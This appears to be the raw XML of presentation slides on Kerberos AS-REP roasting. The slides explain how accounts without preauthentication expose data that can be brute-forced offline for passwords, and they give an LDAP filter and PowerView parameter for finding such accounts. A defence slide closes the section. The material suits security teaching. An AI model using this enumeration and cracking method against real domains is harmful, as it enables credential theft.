        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1116900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BF1D-0FF5-4493-94FE-374E33EF643A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part 3: No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Preauthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Required</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772543FB-89C0-473A-8E1D-2DDD3E0DBB6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79204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D6B6B3C-A678-4484-A5C1-956772EBBE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47064" y="188259"/>
            <a:ext cx="12062012" cy="662846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125F58-6609-F147-9BE6-724F328E4510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Preauthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Required</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65EA6EB-68F8-429B-A7E5-64D6ABADBCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420170" y="2619913"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2587669-04D0-4D9B-81BB-BC081DF06181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8079454" y="4302120"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A12586-5F11-48A7-9A21-AA54520F406D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8448890" y="745904"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB8C559-BC4D-416C-AC0B-99642283F835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="725282"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56AEB47-0CE5-4137-84B5-39C200A366C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="627733"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F71A077-574D-41A8-9262-753E2727C214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="2193086"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636E3B25-6DF4-413F-8F3A-98E90CF3FCC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="1212241"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49D8368-059D-49ED-B859-A99B060563FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8902946" y="4323724"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Picture 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E105EB-92E0-497B-9334-FAE52F467FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2813058" y="2973228"/>
            <a:ext cx="208248" cy="239872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4050062-9873-4FB6-9F2B-AAC6AD8B777E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3377888" y="1639660"/>
            <a:ext cx="5190242" cy="1599172"/>
            <a:chOff x="3196913" y="1306285"/>
            <a:chExt cx="5190242" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30" name="Straight Arrow Connector 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B00F27-22F7-4069-9880-E02010ABAB1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3196913" y="1306285"/>
              <a:ext cx="5190242" cy="1599172"/>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D762194-1087-4543-A897-7D7E6180AB20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4344755" y="1717200"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REP (receive TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB987B3-807E-414B-8FFD-4187C36D1A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9953647" y="1669441"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Group 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D61540-DC03-44A1-8741-932FC8C5B903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2897659" y="585706"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3045555" y="894026"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="51" name="Straight Arrow Connector 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D8D8511-4A08-42CA-B5A4-222AA8E1FA10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3045555" y="894026"/>
              <a:ext cx="5271247" cy="1682278"/>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21C91D3-A3E5-4035-91FE-4988FBDEE9E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4193674" y="1405912"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (request TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3612182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5397-DE5C-49B6-9C96-C100ABC01010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Preauthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Required</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C3580E4-0D9C-4F74-9961-3F0352CE8F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Preauthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be disabled for backwards compatibility with Kerberosv4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part of the AS-REP response from the KDC is encrypted with the user’s long term key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default is AES, however in the AS-REQ you can specify that you only support RC4-HMAC – i.e. use the NTLM hash of the user’s password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bruteforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of AS-REP to recover the user’s password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="761253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5AEF-9F1B-4D4E-87C6-E488B58E1D21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Preauthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Required</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1E1F0BF-246C-4123-A142-8F5528A33E9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify accounts with an LDAP filter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>(userAccountControl:1.2.840.113556.1.4.803:=4194304)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PowerView’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DomainUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has a parameter –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PreauthNotRequired</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/PowerShellMafia/PowerSploit/blob/445f7b2510c4553dcd9451bc4daccb20c8e67cbb/Recon/PowerView.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ASREPRoast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>erberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Party Tricks (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.exumbraops.com/blog/2016/6/1/kerberos-party-tricks-weaponizing-kerberos-protocol-flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="832335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1248D-D406-4827-9148-86A3F77B2F82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Preauthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Required: Defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76B5383A-B746-47E4-9DA2-76864DACC76A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If at all possible always require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>preauthentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>preauthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> MUST be disabled: Ridiculously complex account password</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304062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D6B6B3C-A678-4484-A5C1-956772EBBE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47064" y="188259"/>
            <a:ext cx="12062012" cy="662846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125F58-6609-F147-9BE6-724F328E4510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Kerberos Primer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65EA6EB-68F8-429B-A7E5-64D6ABADBCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420170" y="2619913"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2587669-04D0-4D9B-81BB-BC081DF06181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8079454" y="4302120"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A12586-5F11-48A7-9A21-AA54520F406D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
